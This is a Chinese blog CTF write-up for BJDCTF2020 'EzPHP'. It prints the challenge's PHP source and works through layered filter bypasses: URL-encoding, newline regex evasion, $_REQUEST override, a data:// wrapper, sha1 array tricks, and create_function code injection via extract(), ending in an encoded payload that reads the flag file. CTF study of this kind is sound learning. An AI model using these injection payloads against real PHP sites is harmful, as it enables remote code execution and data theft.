[BJDCTF2020]EzPHP

最新推荐文章于 2024-03-04 07:00:00 发布
最新推荐文章于 2024-03-04 07:00:00 发布
阅读量167 收藏
点赞数 1
分类专栏: 代码审计 RCE # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115600106
版权
ctf做题记录 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
代码审计
25 篇文章 0 订阅
订阅专栏
RCE
11 篇文章 0 订阅
订阅专栏

场景
在这里插入图片描述
看源码
在这里插入图片描述
base32解码后得到
1nD3x.php
访问得源码

 <?php
highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>

这里有多层preg_match,需要一层一层绕过。

第一层。

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

$_SERVER[‘QUERY_STRING’]不会进行url解码,对传入参数进行url编码即可绕过,如?%73hana=1

第二层

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

%0a截断,如?%64ebu=%61qua_is_%63ute%0a

第三层

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
}

$_REQUEST是可以接收POST传入值的,且优先级比GET高,传入debu和file的同时POST debu=1&file=2
file用data协议传入,file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

第四层

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

sha1无法加密数组,如%73hana[]=1&%70a%73swd[]=2(这里ass也被第一层过滤了,所以passwd中间也要编码一下)
最终payload:

?%3d1&%64ebu=%61qua_is_%63ute%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73hana[]=1&%70as%73wd[]=2
POST:debu=1&file=2

在这里插入图片描述
来到了最后一层。
最后参考wp,要用creat_function()代码注入。
这里用extract()进行了变量覆盖。
原理

$my_func=creat_function('$a,$b',return $a+$b)
等价于
function myfunc($a, $b){
    return $a+$b;
}

如果第二个参数可控,传入return$a+$b;}eval();
拼接后变成:

function myfunc($a, $b){
    return $a+$b;
} eval();

看到题目中:
在这里插入图片描述
$arg是可控的。
var_dump(get_defined_vars());输出所有的变量和值。
payload:

flag['code']=creat_function&flag['arg']=}var_dump(get_defined_vars());//拼接后变成

creat_function('',})var_dump(get_defined_vars());function{} var_dump(get_defined_vars());//

最终flag在另一个文件里
require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)
取反绕过关键字过滤

require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))

在这里插入图片描述

fmyyy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]EzPHP 1
Kradress的博客
12-12 959
目录前言源码思路第一层过滤第三层过滤第四层和第二层过滤第五层第六层过滤题解解法一解法二总结 前言 这题也来自Y1ng师傅的babycode,刚刚做完babycode,顺便刷一刷这题 源码 查看源代码 HEX解码 1nD3x.php <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = '
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDctf2020 Ezphp
qq_62984336的博客
03-14 669
BJDctf2020 Ezphp 目录 BJDctf2020 Ezphp 2.preg_match绕过 3.$_REQUEST绕过 4.file_get_contents绕过 5.sha1函数、比较类型数组绕过 6.create_function运用 0.01先查看源码,找到一串疑似base32编码的,解码得到1nD3x.php 0.02访问/1nD3x.php得到源文件 <?php highlight_file(__FILE__); error_reporti.
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4614
前言 最近经常见到BJDCTF赛题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和解题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base解码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
BUUCTF-[BJDCTF2020]EzPHP
m0_52016680的博客
05-07 462
一道挺不错的绕正则表达式的题。 打开环境 点一点发现啥也没有,日常看源码。Ctrl+U发现了一个加密,本以为是base64,但是解码失败,试了试base32成功了 这里推荐一个网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码 各种编码方式加密方式挺全的,值得收藏。 访问之后发现是代码审计 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; ..
BUUCTF [BJDCTF2020]EzPHP1详解
Aiwin的博客
05-14 1329
BUUCTF [BJDCTF2020]EzPHP1包含的知识与详解
BUUCTF-WEB [BJDCTF2020]EzPHP 1
qq_36410265的博客
02-08 625
分析程序执行过程
BUUCTF [BJDCTF2020] EzPHP
Senimo
12-18 2033
BUUCTF [BJDCTF2020] EzPHP 启动环境: 应该是卡巴斯基的网络安全威胁图,但加载不出来,但不影响做题。 鼠标右键点击不了,在地址前添加:view-source:查看网页源码: <html> <!-- Here is the real page =w= --> <!-- GFXEIM3YFZYGQ4A= --> <head> 经过Base32解码,得到信息:1nD3x.php 访问该页面,得到源码: <?php highligh
[BJDCTF2020]EzPHP1 --不会编程的崽
最新发布
不会编程的崽的博客
03-04 1297
ctf create_function $_server&$request的绕过
buuctf web [BJDCTF2020]EzPHP
qq_40327508的博客
03-12 2830
进入后是这样的 查看源代码发现注释 base32解码得到1nD3x.php,发现是源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; e...
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
[网鼎杯2018]Unfinish
fmyyy1的博客
04-15 2232
场景 既然有login.php那就会有register.php,访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入,再注册一个账号。 用户名变成了0,证明存在二次注入。 fuzz之后发现逗号,information等许多关键字被过滤了。 绕过方法: mysql中,+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0,但我们可以用ascii编码进行计算。 select '0'+ascii(
[HFCTF2020]EasyLogin
fmyyy1的博客
04-13 2018
对js不是很了解,这题边看wp边学。 是一个登录界面。 注册一个账号登录 flag没有显示,看源码。 看到了app.js,访问可看到源码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); const password = $("#password").val(); const token =
[极客大挑战 2020]Greatphp
fmyyy1的博客
05-22 1358
知识点 php原生类的利用 源码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[GYCTF2020]Ezsqli
fmyyy1的博客
04-05 1280
查询界面,猜测sql注入,查询抓包 fuzz后发现information_schema,or,union等关键字被过滤了,应该是要无列名注入。 用^代替or id=0^(length(database())>1) 证明存在sql注入 InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列.
[WMCTF2020]Make PHP Great Again
fmyyy1的博客
05-25 1264
源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 解法一 这一看就是session.upload_progress文件包含 import io import requests import threading sessid = 'bbbbbbb' data = {"cmd":"system('cat flag.ph
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值